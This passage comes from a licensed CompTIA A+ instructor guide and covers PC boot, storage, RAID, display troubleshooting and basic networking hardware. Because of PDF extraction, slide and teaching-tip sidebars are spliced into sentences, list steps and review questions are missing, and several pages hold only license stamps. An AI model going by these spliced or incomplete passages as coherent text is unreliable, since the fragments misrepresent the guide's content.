immediately if there are any unusual sights, smells, or noises.
On modern computers the POST happens very quickly to improve boot times, so you are
unlikely to see any POST messages. Also, the PC is likely to be configured to show a logo
screen and will only display messages under error conditions.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
100 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
If power is present—you can hear the fans spinning, for instance—but the
computer does not start, there is a black screen, and there are no beeps from
the internal speaker, it is likely either that the display is faulty or that the POST
procedure is not executing. Assuming you can rule out an issue with the display, to
troubleshoot POST, try the following tests and solutions:
1. Ask what has changed—If the system firmware has been updated and the
PC has not booted since, the system firmware update may have failed. Use the
reset procedure.
3. Check for faulty interfaces and devices—It is possible that a faulty adapter
card or device is halting the POST. Try removing one device at a time to see if
this solves the problem (or remove all non-essential devices, then add them
back one by one).
4. Check the PSU—Even though the fans are receiving power, there may be a
fault that is preventing the power good signal from being sent to the CPU,
preventing POST.
5. Check for a faulty CPU or system firmware—If possible, replace the CPU
chip with a known good one or update the system firmware.
If POST runs but detects a problem, it generates an error message. As the fault may
prevent the computer from displaying anything on the screen, the error is often
indicated by a beep code. Use resources such as the manufacturer's website to
determine the meaning of the beep code.
The codes for the original IBM PC are listed in this table.
Code Meaning
1 short beep Normal POST—system is OK. Most modern PCs are
configured to boot silently, however.
2 short beeps POST error—error code shown on screen.
No beep Power supply, motherboard problem, or faulty
onboard speaker.
Continuous beep Problem with system memory modules or memory
controller.
Repeating short beeps Power supply fault or motherboard problem.
1 long, 1 short beep Motherboard problem.
1 long, 2 or 3 short beeps Video adapter error.
3 long beeps Keyboard issue (check that a key is not depressed).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 101
Some PCs will not boot if a key is stuck. Check that nothing is resting on the keyboard. If
the board is clogged with dust or sticky liquid, clean it using approved products, such as
swabs and compressed air blowers.
• If the drives are connected to a motherboard port, check that it has not been
disabled by a jumper or via system setup.
• With the modern globally unique ID (GUID) partition table (GPT) boot scheme,
the boot information is not restricted to a single sector but still serves the same
basic purpose of identifying partitions and OS boot loaders.
Whether the disk is using an MBR or GPT partitioning scheme, damage to these
records results in boot errors such as “Boot device not found,” “OS not found,” or
“Invalid drive specification.” If this problem has been caused by malware, the best
way to resolve it is to use the boot disk option in your anti-virus software. This will
include a scanner that may detect the malware that caused the problem in the first
place and contain tools to repair the boot sector.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
102 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
If you don't have the option of using a recovery disk created by the anti-virus
software, you can try to use the repair options that come with the OS setup disk.
Blue screen of death (BSOD) preventing a Windows PC from booting. (Screenshot courtesy
of Microsoft.)
Show A blue screen is a Windows proprietary crash screen. A macOS system that suffers
Slide(s) catastrophic process failure shows a spinning pinwheel (of death), also called a
Troubleshoot Drive
spinning wait cursor. Linux displays a kernel panic or “Something has gone wrong”
Availability message.
Interaction
Opportunity Troubleshoot Drive Availability
Ask learners to listen A hard disk drive (HDD) is most likely to fail due to mechanical problems either in
to their PCs to detect
the first few months of operation or after a few years. A solid-state drive (SSD) is
normal disk noise
(hopefully) and to typically more reliable but also has a maximum expected lifetime. With any fixed
observe any disk disk, sudden loss of power can cause damage and/or file corruption, especially if
status indicator lights. power loss occurs in the middle of a write operation.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 103
• No LED status indicator activity—If disk activity lights are not active, the whole
system might not be receiving power, or the individual disk unit could be faulty.
• Bootable device not found—If the PC fails to boot from the fixed disk, it is
either faulty or there is file corruption.
• Missing drives in OS—If the system boots, but a second fixed disk or removable
drive does not appear in tools such as File Explorer or cannot be accessed via
the command-line, first check that it has been initialized and formatted with a
partition structure and file system. If the disk is not detected by a configuration
tool such as Windows Disk Management, suspect that it has a hardware or cable/
connector fault.
• Read/write failure—This means that when you are trying to open or save a file,
an error message such as “Cannot read from the source disk” is displayed. On an
HDD, this is typically caused by bad sectors. A sector can be damaged through
power failure or a mechanical fault. If you run a test utility, such as chkdsk, and
more bad sectors are located each time the test is run, it is a sign that the disk is
about to fail. On an SSD, the cause will be one or more bad blocks. SSD circuitry
degrades over the course of many write operations. An SSD is manufactured
with “spare” blocks and uses wear leveling routines to compensate for this. If
the spare blocks are all used up, the drive firmware will no longer be able to
compensate for ones that have failed.
• Blue screen of death (BSOD)—A failing fixed disk and file corruption may cause
a particularly severe read/write failure, resulting in a system stop error (a crash
screen).
When experiencing any of these symptoms, try to make a data backup and replace
the disk as soon as possible to minimize the risk of data loss.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
104 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
You can also use Windows utilities to query SMART and run manual tests.
Viewing SMART information via the SpeedFan utility. (Screenshot courtesy of Microsoft.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 105
These tests can detect whether there is any damage to the device’s storage
mechanisms. In the case of performance, they can report statistics such as input/
output operations per second (IOPS). If performance is reduced from the
vendor’s baseline measurements under test conditions, it is likely that the device
itself is faulty. If performance metrics are similar to the device’s benchmark under
test conditions, any slow read/write access observed during operation is likely to
be due to a more complex system performance issue. Possible causes include
application load and general system resource issues, file fragmentation (on hard
disks), and limited remaining capacity.
Extended read/write times can also occur because particular sectors (HDDs) or
blocks (SSDs) fail (go “bad”). Data loss/corruption means that files stored in these
locations cannot be opened or simply disappear. When bad sectors or blocks are
detected, the disk firmware marks them as unavailable for use.
If there is file corruption on a hard disk and no backup, you can attempt to recover
data from the device using a recovery utility.
File recovery from an SSD is not usually possible without highly specialized tools.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
106 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The redundant storage is made available as a volume, which can be partitioned and
formatted in the OS as one or more drives.
There are two main scenarios for RAID failure: failure of a device within the array
and failure of the whole array or volume.
If one of the underlying devices fails, the volume will be listed as “degraded,” but
the data on the volume will still be accessible and it should continue to function as a
boot device, if so configured.
RAID 0 has no redundancy, so if one of the disks fails, the volume will stop working. RAID
0 only has specialist uses where speed is more important than reliability.
Most desktop-level RAID solutions can tolerate the loss of only one disk, so it should
be replaced as soon as possible. If the array supports hot swapping, then the new
disk can simply be inserted into the chassis of the computer or into a disk chassis.
Once this is done, the array can be rebuilt using the RAID configuration utility (if a
hardware RAID controller is used) or an OS utility (if you are using software RAID).
Note that the rebuilding process is likely to severely affect performance as the
controller is probably writing multiple gigabytes of data to the new disk.
RAID errors using the configuration utility. This volume is missing one of its disks.
When hot swapping a faulty disk out, take extreme caution not to remove a healthy
disk from the array as making a mistake could cause the array to fail, depending on the
configuration. Disk failure is normally indicated by a red LED. Always make a backup
beforehand.
If a volume is not available, either more than the tolerated number of disks has
failed, or the controller has failed. If the boot volume is affected, then the operating
system will not start. If too many disks have failed, you will have to turn to the latest
backup or try to use file recovery solutions. If the issue is controller failure, then
data on the volume should be recoverable, though there may be file corruption if
a write operation was interrupted by the failure. Either install a new controller or
import the disks into another system.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 107
If the failure affects the boot process, use the RAID configuration utility to verify
its status. If you cannot access the configuration utility, then the controller itself is
likely to have failed.
Boot message indicating a problem with the RAID volume. PressCtrl+C to start the utility
and troubleshoot.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
108 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Power and Disk Issues
6
Show 1. You have been servicing a computer, but when you have finished you
Slide(s) find that it will not turn on. There was no power problem before, and
Review you have verified that the computer is connected to a working electrical
outlet. What is the most likely explanation?
Teaching
Tip It is most likely that one or more power connectors have not been reconnected.
Take some time at
Check the P1 motherboard connector, a 4-pin CPU connector, and all necessary
the end of each topic SATA or Molex device connectors. Also, the cable connecting the power button to a
to answer questions. motherboard header could have been disconnected.
You can use the
review questions 2. Additional memory was installed in a user's system, and now it will not
for discussion in boot. What steps would you take to resolve this job ticket?
class or set them for
students to complete Use the vendor’s system setup guide to verify that the correct memory type was
individually during or installed on the system and in the correct configuration (consider whether dual-
after class.
channel memory was installed in the correct slots). Check that the new memory
module is seated properly in its slot. Try swapping memory around in the memory
slots.
3. You are trying to install Windows from the setup disc, but the computer
will not boot from the DVD. What should you do?
Check that the boot order in system setup is set correctly. If the boot order is
correct, check that the disc is not dirty or scratched. If the disc loads in another
computer, check that the optical drive data and power cables are connected.
4. Following a power cut, a user reports that their computer will not boot.
The message “BCD missing” is shown on the screen. The computer does
not store data that needs to be backed up. What is the best first step to
try to resolve the issue?
Use a system recovery disk to try to repair the disk drive’s boot information.
5. A user reports that there is a loud clicking noise when she tries to save a
file. What should be your first troubleshooting step?
Determine whether a data backup has been made. If not, try to make one.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 109
6. You receive a support call from a user of one of the company’s computer-
aided design (CAD) workstations. The user reports that a notification “RAID
utility reports that the volume is degraded” is being displayed. A recent
backup has been made. What should you do to try to restore the array?
A degraded volume is still working but has lost one of its disks. In most RAID
configurations, another disk failure would cause the volume to fail, so you should
add a new disk as soon as possible (though do note that rebuilding the array will
reduce performance).
7. A user reports hearing noises from the hard disk—does this indicate it is
failing and should be replaced?
Not necessarily. Hard disks do make noises, but they are not all indicators of a
problem. Question the user to find out what sort of noises are occurring or inspect
the system yourself.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
110 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 3D
Troubleshoot System and Display Issues
8
Teaching As a CompTIA A+ technician, many of the service calls that you respond to will
Tip involve troubleshooting a wide range of issues and scenarios, including intermittent
This topic covers faults, performance problems, and display errors. Your ability to quickly and
troubleshooting effectively diagnose and solve the problems across a range of scenarios will be
overheating issues, essential in maintaining an optimal environment for the users you support.
performance issues,
and video issues.
Exam candidates Troubleshoot Component Issues
will need to be able
to recognize typical Symptoms such as the system locking up, intermittent shutdowns, continuous
symptoms and their rebooting, OS blue screen/Kernel panic errors, and application crashes are difficult
likely causes.
to diagnose with a specific cause, especially if you are not able to witness the events
Show directly. The most likely causes are software, disk/file corruption problems, or
Slide(s) malware.
Troubleshoot If you can discount these, try to establish whether the problem is truly intermittent
Component Issues or whether there is a pattern to the errors. If they occur when the PC has been
running for some time, it could be a thermal problem.
Next, check that the power supply is providing good, stable voltages to the system.
If you can discount the power supply, you must start to suspect a problem with
memory, CPU, or motherboard. The vendor may supply a diagnostic test program
that can identify hardware-level errors. These programs are often run from the
firmware setup utility rather than from the OS.
If no diagnostic utilities are available, you might be able to identify motherboard,
RAM, or CPU hardware issues by observing physical symptoms.
Overheating
Excessive heat can easily damage the sensitive circuitry of a computer. If a system
feels hot to the touch, you should check for overheating issues. Unusual odors,
such as a burning smell or smoke, will almost always indicate something (probably
the power supply) is overheating. The system should be shut down immediately
and the problem investigated. A burning smell may also arise because the case and/
or fan vents are clogged with dust.
CPUs and other system components heat up while running. Take care not to burn
yourself when handling internal components.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 111
Other techniques for diagnosing and correcting overheating issues include the
following:
• Most systems come with internal temperature sensors that you can check via
driver or management software. Use the vendor documentation to confirm that
the system is operating within acceptable limits.
• Ensure that the CPU fan is working. Proper cooling is vital to the lifespan
and performance of the processor. If the processor is running too hot, it can
decrease performance. A processor that is overheating can cause crashes or
reboot the machine. Is the fan's power cable properly connected? Is the fan
jammed, clogged, or too small? If a processor upgrade is installed, the fan from
the original CPU may not be suitable for the new device.
• Make sure the heat sink is properly fitted. It should be snug against the
processor. It might be necessary to clean away old thermal paste and replace it
to help the processor to run at a lower temperature.
• Always use blanking plates to cover up holes in the back or front of the PC. Holes
can disrupt the airflow and decrease the effectiveness of the cooling systems.
• Verify whether the room in which the PC is installed is unusually warm or dusty
or whether the PC is positioned near a radiator or in direct sunlight.
Thermal problems may also affect system operation by causing loose connectors
to drift apart, components to move in their sockets, or circuit board defects such
as hairline cracks to widen and break connections. Some of these faults can be
detected by visual inspection.
Physical Damage
Actual physical damage to a computer system is usually caused to peripherals,
ports, and cables. Damage to other components is only likely if the unit has been in
transit somewhere. Inspect a unit closely for damage to the case; even a small crack
or dent may indicate a fall or knock that could have caused worse damage to the
internal components than is obvious from outside.
If a peripheral device does not work, examine the port and the end of the cable
closely for bent, broken, or dirty pins and connectors. Examine the length of the
cable for damage.
Few problems are actually caused by the motherboard itself, but there are a few
things to be aware of.
• The motherboard's soldered chips and components could be damaged by
electrostatic discharge (ESD), electrical spikes, or overheating.
• In some cases, errors may be caused by dirt (clean the contacts on connectors)
or chip creep, where an adapter works loose from its socket over time, perhaps
because of temperature changes.
• If a system has had liquid spilled on it or if fans or the keyboard are clogged by
dust or dirt, there may be visible signs of this.
• If a component has “blown,” it can leave scorch marks. You could also look for
capacitor swelling. The capacitors are barrel-like components that regulate the
flow of electricity to the system chips. If they are swollen or bulging or emitting
any kind of residue, they could have been damaged or could have failed due to a
manufacturing defect.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
112 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
If there is physical damage to the motherboard, you will almost certainly need
diagnostic software to run tests that confirm whether there is a problem. Testing
by substituting “known good” components would be too time consuming and
expensive. It is worth investigating any environmental problems or maintenance
procedures that could be the “root cause” of the error.
A bottleneck is an underpowered component that slows down the whole system. For
example, a PC might have a fast CPU, dedicated graphics, and lots of system memory,
but if the fixed disk is an HDD, then performance will be very slow.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 113
The real time clock (RTC) is a part of the chipset that keeps track of the calendar
date and time. This component runs on battery power when the computer is turned
off. The RTC battery is a coin cell lithium battery.
If the date or time displayed in the system firmware setup program is inaccurate,
it can be a sign that the RTC battery is failing. You should replace it with the same
size and type. Typically, the coin cell type is CR2032, but check the motherboard
documentation.
The RTC battery is also often called the CMOS battery. On older computers, system
firmware custom settings were saved to CMOS RAM. CMOS stands for complementary
metal-oxide semiconductor, which describes the manufacturing process used to make
the RAM chip. CMOS requires battery backup to save data. On current motherboards,
configuration data is stored in a non-volatile RAM (NVRAM) chip (flash memory), rather
than in CMOS RAM. Flash memory does not require battery backup.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
114 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
To rule out cable problems, use the “known good” technique and substitute with
another cable. Alternatively, try the monitor with a different PC to identify whether the
problem is with the display unit or with the input source.
Burned-Out-Bulb Issues
A video projector is a large-format display, suitable for use in a presentation or
at a meeting. The image is projected onto a screen or wall using a lens system.
Like display monitors, projectors can use different imaging technologies, such as
cathode ray tube (CRT), liquid crystal display (LCD), and digital light processing (DLP).
Where a PC monitor display uses a small backlight or LED array, a projector uses a
very strong bulb light source to project the image onto a screen or backdrop.
Projector bulbs have a limited lifetime and will often need to be replaced. You might
notice the image generated by the projector start to dim. There may also be a bulb
health warning indicator light. A completely failed bulb is referred to as a burned-
out bulb. You might hear the bulb “pop” and observe scorch marks on the inside or
a broken filament.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 115
Take care when handling projectors. During use, the bulb becomes very hot, and while
it is hot, it will be very fragile. Allow a projector to cool completely before attempting to
remove it.
• Fuzzy image—If the output resolution does not match the display device’s
native resolution, the image will appear fuzzy. This typically happens if the video
card’s driver is faulty or incorrectly configured. For example, the TFT monitor’s
resolution might be 1920x1080, but the video card is set to 1024x768. Use the
OS to change the output resolution or update the driver.
A flashing screen could also be caused by a faulty or overheating video card. Attach the
display device to a different computer to isolate the cause of the issue.
• Burn-in—When the same static image is displayed for an extended period, the
monitor's picture elements can be damaged, and a ghost image is “burned”
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
116 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
permanently onto the display. Devices such as plasma screens and organic
LED (OLED) displays can be more vulnerable to burn-in than ordinary TFT/LED
displays. Always ensure that a display is set to turn off, or use an animated
screen saver when no user input is detected.
A TFT/LED monitor uses an LED backlight to illuminate the image. In an OLED, each pixel
provides its own illumination.
You may also come across color glitches, such as purple or green horizontal lines
or colors changing unexpectedly. These are usually caused by a faulty or loose
connector or cabling that is either faulty or insufficient quality for the current
image resolution. Try replacing the cable. If this does not fix the issue, there
could be a hardware fault in either the monitor or graphics adapter.
• Audio issues—HDMI and DisplayPort can deliver a combined video and audio
signal if that is supported by the video card. DVI and VGA cannot carry a sound
signal, so the speakers must be connected to the computer’s audio ports using
3.5 mm jacks. If there is no sound from built-in or separate speakers, check
power, cables/connectors, and any physical volume control on the speaker
device. If you can discount these issues, use the OS to verify that the audio
output is set to the correct device and check the OS volume control.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 117
Review Activity:
System and Display Issues
9
A dim image is likely to be caused by a blow bulb (or one that is about to blow).
If there is no visible sign of damage to the bulb, you should rule out a simple
configuration issue, such as the brightness control being turned all the way down.
Replace the cable with a known good one. If this does not solve the problem,
suspect an issue with the monitor. As the PC was used with no issues with another
monitor, there is not likely to be an issue with the video card.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
118 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Lesson 3
Summary
5
Show You should be able to apply the CompTIA A+ troubleshooting model to common
Slide(s) scenarios and diagnose symptoms such as no power, POST error, boot device
Summary
failure, storage device/RAID issue, or display device issue.
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 4
Comparing Local Networking
1
Hardware
LESSON INTRODUCTION
Network support is a great competency for IT technicians at all levels to possess. Show
In today’s environment, standalone computing is a rarity. Just about every digital Slide(s)
device on the planet today is connected to external resources via a network,
Objectives
whether it is a small office/home office (SOHO) network, a corporate WAN, or to the
Internet directly. Teaching
Tip
The ability to connect, share, and communicate using a network is crucial for
This lesson starts a
running a business and staying connected to everything in the world. As a new section of the
CompTIA® A+® support technician, if you understand the technologies that course focused on
underlie both local and global network communications, you can play an important networking. This
role in ensuring that the organization you support stays connected. takes in domain
2 (networking)
This lesson will help you understand how different types of networks are and domain 4
categorized and how to compare and contrast network cabling, hardware, and (virtualization/
wireless standards. cloud) plus most
of the remaining
objectives in domains
Lesson Objectives 3 (hardware) and 5
(troubleshooting).
In this lesson, you will: The Core 1 exam
objectives focus on
• Compare network types. network hardware
and infrastructure
• Compare networking hardware. (such as application
protocols and server
• Explain network cable types. roles). Explain that as
computing devices
• Compare wireless networking types. become more
reliable and easier
to configure (as
hardware), the role
of a PC or IT support
technician has shifted
to include a greater
network support role
than previously.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
120 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 4A
Compare Network Types
2
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 121
Teaching
Tip
Compare the
requirements and
features of enterprise
networks to SOHO
networks.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
122 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 123
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
124 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Network Types
3
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 125
Topic 4B
Compare Networking Hardware
4
For the NIC to be able to process the electrical or light signals as digital data, the Teaching
signals must be divided into regular units with a consistent format. There must Tip
also be a means for each node on the local network to address communications to
Explain that NICs
other nodes. Ethernet provides a data link protocol to perform these framing and perform two functions:
addressing functions. the transceiver
implements a port
Each Ethernet NIC port has a unique hardware/physical address, called the “media for a particular type
access control” (MAC) address. Each frame of Ethernet data identifies the source of cable and signaling
MAC address and destination MAC address in fields in a header. (electrical/twisted pair
or optical/fiber optic).
The data link function
organizes signals into
frames and uses MAC
addressing to identify
each interface/port.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
126 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Captured Ethernet frame showing the destination and source MAC addresses. The destination
address is a broadcast address. (Screenshot courtesy of Wireshark.)
A MAC address consists of 48 binary digits, making it six bytes in size. A MAC
address is typically represented as 12 digits of hexadecimal. Hex is a numbering
system often used to represent network addresses of different types. A hex digit
can be one of sixteen values: 0–9 and then A, B, C, D, E, F. Each hex digit represents
half a byte (or four bits or a nibble). The 12 digits of a MAC address might be
written with colon or hyphen separators or no separators at all—for example,
00:60:8c:12:3a:bc or 00608c123abc.
Patch Panels
Show In most types of office cabling, the computer is connected to a wall port and—via
Slide(s) cabling running through the walls—to a patch panel. The cables running through
Patch Panels
the walls are terminated to insulation displacement connector (IDC) punchdown
blocks at the back of the panel.
Teaching
Tip
Explain that while A+
is mostly focused on
SOHO networking,
there are some
examples that relate
to campus/enterprise
networking.
IDCs at the rear of a patch panel. (Image by plus69 © 123RF.com.)
Point out the
importance of
labelling ports and The other side of the patch panel has prewired RJ45 ports. A patch cord is used
cables in patch panels. to connect a port on the patch panel to a port on an Ethernet switch. This cabling
design makes it easier to change how any given wall port location is connected to
the network via switch ports.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 127
Patch panel with prewired RJ45 ports. (Image by Svetlana Kurochkina © 123RF.com.)
It is vital to use an effective labeling system when installing structured cabling so that
you know which patch panel port is connected to which wall port.
Hubs
A hub is a legacy network hardware device that was used to implement the Show
10BASE-T and 100BASE-T Ethernet cabling designs. This design is referred to as a Slide(s)
star topology“ because each end system is cabled to a concentrator (the hub). Hubs
A hub has a number of ports—typically between four and 48—and each computer
Teaching
is cabled to one port. The circuitry in the hub repeats an incoming transmission
Tip
from a computer attached to one port across all the other ports. In effect, the
computers seem to be attached to the same cable. Each computer attached to a Explain that star
topology wiring
hub receives all the traffic sent by other connected devices. This is referred to as a
uses a concentrator
“collision domain.” appliance to create
connections between
the end systems. In
early Ethernet, this
concentrator function
was performed by a
hub.
Make sure students
understand the basic
concept of a collision
domain and the
performance issues it
raises.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
128 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using a hub to implement an Ethernet. Node A transmits a signal, which is received by the hub and
forwarded out of each other port for reception by all the other nodes. (Image © 123RF.com.)
Each computer will ignore any frames that do not match its MAC address. However,
Show when lots of computers are in the same collision domain, performance is reduced,
Slide(s) as only one computer can send a frame at any one time. If two computers try
Switches to send at the same time, there is a collision, and they must wait for a random
period before trying again. The more computers there are, the more collisions. The
Teaching computers contend for a share of the media bandwidth and all communications are
Tip half-duplex. Half-duplex means that the computer can send or receive, but not at
Explain that switches the same time.
perform the same
basic concentrator
As well as the effect of contention on performance, there are no hubs that are
function and are compatible with Gigabit Ethernet. These limitations mean that almost all networks
also wired in a star are now based on Ethernet switching. You are only likely to encounter a hub being
topology, but they used in very specific circumstances, such as where legacy equipment must be kept
work much more in service.
efficiently. The switch
tracks MAC addresses
for each of its ports Switches
(implementing
the function of an A solution to the issue of collisions was first provided by inserting Ethernet bridges
Ethernet bridge). between hubs to break up collision domains. Ethernet bridges were quickly
Where possible,
refined into the Ethernet switch appliances that underpin almost all modern office
it uses learned
MAC addresses to networks. Like a hub, an Ethernet switch provisions one port for each device that
forward frames to the needs to connect to the network. Unlike a hub, an Ethernet switch can decode
destination port only, each frame and identify the source and destination MAC addresses. It can track
rather than flooding which MAC source addresses are associated with each port. When it receives an
them out of all ports. incoming frame, the switch intelligently forwards it to the port that is a match for
This means that each
switch port is a single
the destination MAC address.
collision domain and
works in full-duplex
mode at the full speed
of the network media.
Explain that switches
are required for
Gigabit Ethernet and
better.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 129
This means that each switch port is a separate collision domain, and the negative
effects of contention are eliminated. Each computer has a full duplex connection to
the network and can send and receive simultaneously at the full speed supported
by the network cabling and NIC.
Show
When a computer sends a frame, the switch reads the source address and adds it to its Slide(s)
MAC address table. If a destination MAC address is not yet known, the switch floods the Unmanaged and
frame out of all ports. Managed Switches
Teaching
Tip
Unmanaged and Managed Switches Explain that switches
are available in a wide
An unmanaged switch performs its function without requiring any sort of range of types with
configuration. You just power it on and connect some hosts to it, and it establishes different performance
Ethernet connectivity between the network interfaces without any more characteristics.
intervention. You might find unmanaged switches with four or eight ports used in Unmanaged switches
small networks. There is an unmanaged four-port switch embedded in most of the are supplied as
SOHO router/modems supplied by Internet Service Providers (ISPs) to connect to desktop or rack-
mounted units and
their networks. are also an embedded
function in SOHO
On some older SOHO routers, the LAN interfaces are implemented as a hub. These do Internet router/
not support 1 Gbps operation. modems.
Managed switches are
usually rack mounted.
Enterprises might
deploy switches within
Larger workgroups and corporate networks require additional functionality in their modular chassis.
switches. Switches designed for larger LANs are managed switches. A managed
Explain that managed
switch will work as an unmanaged switch out of the box, but an administrator can
switches are usually
connect to it over a management port, configure security settings, and then choose operated using
options for the switch’s more advanced functionality. Most managed switches are a command-line
designed to be bolted into standard network racks. A typical workgroup switch will interface, though
come with 24 or 48 access ports for client PCs, servers, and printers. These switches some have web
have uplink ports allowing them to be connected to other switches. management GUIs.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
130 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
An enterprise might also use modular switches. These provide a power supply and
fast communications backplane to interconnect multiple switch units. This enables
the provisioning of hundreds of access ports via a single compact appliance.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 131
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
132 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Networking Hardware
5
Show 1. True or false? A MAC address identifies the network to which a NIC is
Slide(s) attached.
Review False. A media access control (MAC) address is a unique hardware identifier for an
Teaching
interface port. It does not convey any information about logical network addresses.
Tip 2. A workstation must be provisioned with a 4 Gbps network link. Is it
Take some time at possible to specify a single NIC to meet this requirement?
the end of each topic
to answer questions. Yes. On an NIC with 4 gigabit Ethernet ports, the ports can be bonded to establish a
You can use the 4 Gbps link.
review questions
for discussion in 3. You are completing a network installation as part of a team. Another
class or set them for
students to complete
group has cabled wall ports to a patch panel. Is any additional
individually during or infrastructure required?
after class.
Yes. The patch panel terminates cabling, but it does not establish any connections
between the cable segments. You must install a networking appliance to act as a
concentrator and connect the cable segments. On modern networks, this means
installing a switch and cabling it to the patch panel ports using RJ45 patch cords.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 133
Topic 4C
Explain Network Cable Types
5
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
134 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
F/UTP cable with a foil screen surrounding unshielded pairs. (Image by Baran Ivo and released to
public domain.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 135
Cat Standards
A Cat specification is a particular twisted pair cable construction method rated Show
for use with given Ethernet standards. Higher Cat specification cable is capable of Slide(s)
higher data rates. Cat specifications are defined in the TIA/EIA-568-C Commercial Cat Standards
Building Telecommunications Cabling Standards.
